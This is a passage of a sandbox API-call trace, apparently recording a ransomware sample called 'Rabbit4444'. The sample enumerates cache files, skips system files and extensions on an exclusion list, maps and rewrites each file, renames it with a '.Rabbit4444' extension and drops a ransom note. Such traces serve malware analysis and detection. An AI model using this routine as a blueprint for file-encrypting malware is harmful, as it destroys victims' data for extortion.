"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\b912b2c6928a18b8cd7d50cf08bea95b_e0ddba93f290048b39ab8760981195ae"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.968] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.968] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15427847690) returned 1 [0062.968] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=494) returned 1 [0062.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0062.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0062.968] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f0, lpName=0x0) returned 0x27c [0062.972] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f0) returned 0x70000 [0062.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0062.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0062.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0062.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0062.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0062.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0062.973] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15428401386) returned 1 [0062.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0062.973] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0062.973] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.973] CloseHandle (hObject=0x27c) returned 1 [0062.974] CloseHandle (hObject=0x2a0) returned 1 [0062.974] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE.Rabbit4444") returned 191 [0062.974] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\b912b2c6928a18b8cd7d50cf08bea95b_e0ddba93f290048b39ab8760981195ae"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\B912B2C6928A18B8CD7D50CF08BEA95B_E0DDBA93F290048B39AB8760981195AE.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\b912b2c6928a18b8cd7d50cf08bea95b_e0ddba93f290048b39ab8760981195ae.rabbit4444"), dwFlags=0x1) returned 1 [0062.974] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x8addc228, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0xff50e022, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0062.974] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.974] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.975] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Rabbit4444.exe") returned -1 [0062.975] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2=".") returned 1 [0062.975] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="..") returned 1 [0062.975] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="windows") returned -1 [0062.975] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="bootmgr") returned 1 [0062.975] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="pagefile.sys") returned -1 [0062.975] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="boot") returned 1 [0062.975] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="ids.txt") returned -1 [0062.975] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="NTUSER.DAT") returned -1 [0062.975] lstrcpyW (in: lpString1=0x130ec1e, lpString2="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" | out: lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" [0062.975] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", dwFileAttributes=0x2020) returned 1 [0062.975] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", dwFileAttributes=0x2004) returned 1 [0062.975] lstrlenW (lpString="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 65 [0062.975] lstrlenW (lpString="Rabbit4444") returned 10 [0062.975] lstrcmpiW (lpString1="2451D392CF", lpString2="Rabbit4444") returned -1 [0062.975] lstrlenW (lpString=".dll") returned 4 [0062.975] lstrcmpiW (lpString1="92CF", lpString2=".dll") returned 1 [0062.975] lstrlenW (lpString=".lnk") returned 4 [0062.975] lstrcmpiW (lpString1="92CF", lpString2=".lnk") returned 1 [0062.975] lstrlenW (lpString=".ini") returned 4 [0062.975] lstrcmpiW (lpString1="92CF", lpString2=".ini") returned 1 [0062.976] lstrlenW (lpString=".sys") returned 4 [0062.976] lstrcmpiW (lpString1="92CF", lpString2=".sys") returned 1 [0062.976] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.976] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.976] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15428665804) returned 1 [0062.976] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=398) returned 1 [0062.976] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0062.976] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0062.976] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x490, lpName=0x0) returned 0x27c [0062.978] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x490) returned 0x70000 [0062.978] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0062.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0062.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0062.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0062.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0062.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0062.979] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15428973181) returned 1 [0062.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0062.979] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0062.979] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.979] CloseHandle (hObject=0x27c) returned 1 [0062.979] CloseHandle (hObject=0x2a0) returned 1 [0062.979] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.Rabbit4444") returned 191 [0062.979] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.rabbit4444"), dwFlags=0x1) returned 1 [0062.980] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdaf50849, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 1 [0062.980] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.980] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.980] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="Rabbit4444.exe") returned -1 [0062.980] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".") returned 1 [0062.980] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="..") returned 1 [0062.980] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="windows") returned -1 [0062.980] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="bootmgr") returned 1 [0062.980] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="pagefile.sys") returned -1 [0062.980] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="boot") returned 1 [0062.980] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="ids.txt") returned -1 [0062.981] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="NTUSER.DAT") returned -1 [0062.981] lstrcpyW (in: lpString1=0x130ec1e, lpString2="FB0D848F74F70BB2EAA93746D24D9749" | out: lpString1="FB0D848F74F70BB2EAA93746D24D9749") returned="FB0D848F74F70BB2EAA93746D24D9749" [0062.981] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2020) returned 1 [0062.981] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2004) returned 1 [0062.982] lstrlenW (lpString="FB0D848F74F70BB2EAA93746D24D9749") returned 32 [0062.982] lstrlenW (lpString="Rabbit4444") returned 10 [0062.982] lstrcmpiW (lpString1="46D24D9749", lpString2="Rabbit4444") returned -1 [0062.982] lstrlenW (lpString=".dll") returned 4 [0062.982] lstrcmpiW (lpString1="9749", lpString2=".dll") returned 1 [0062.982] lstrlenW (lpString=".lnk") returned 4 [0062.982] lstrcmpiW (lpString1="9749", lpString2=".lnk") returned 1 [0062.982] lstrlenW (lpString=".ini") returned 4 [0062.982] lstrcmpiW (lpString1="9749", lpString2=".ini") returned 1 [0062.982] lstrlenW (lpString=".sys") returned 4 [0062.982] lstrcmpiW (lpString1="9749", lpString2=".sys") returned 1 [0062.982] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\fb0d848f74f70bb2eaa93746d24d9749"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.982] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.982] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15429294976) returned 1 [0062.982] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=290) returned 1 [0062.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0062.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0062.982] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x430, lpName=0x0) returned 0x27c [0062.984] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430) returned 0x70000 [0062.987] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123820 [0062.987] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0062.987] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0062.987] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0062.987] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.988] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0062.988] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.988] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0062.988] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15429843508) returned 1 [0062.988] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0062.988] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0062.988] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.988] CloseHandle (hObject=0x27c) returned 1 [0062.988] CloseHandle (hObject=0x2a0) returned 1 [0062.988] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749.Rabbit4444") returned 158 [0062.988] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\fb0d848f74f70bb2eaa93746d24d9749"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\fb0d848f74f70bb2eaa93746d24d9749.rabbit4444"), dwFlags=0x1) returned 1 [0062.989] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdaf50849, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdaf50849, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 0 [0062.989] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0062.989] lstrcpyW (in: lpString1=0x130ec1e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.989] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\metadata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.989] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0062.989] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.990] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.990] CloseHandle (hObject=0x2a0) returned 1 [0062.990] CloseHandle (hObject=0x298) returned 1 [0062.990] GetCurrentThreadId () returned 0xd98 [0062.990] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122208 [0062.990] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content" [0062.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116dd8 | out: hHeap=0xe0000) returned 1 [0062.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0062.990] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content" [0062.990] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\" [0062.990] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3" [0062.990] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\microsoft\\cryptneturlcache\\content\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.993] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.995] FlushFileBuffers (hFile=0x298) returned 1 [0062.996] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.997] CloseHandle (hObject=0x298) returned 1 [0062.997] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content") returned 113 [0062.997] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.997] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8addc228, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xdaf50849, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xeedee7bf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0062.997] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.997] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.997] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.997] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.997] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: 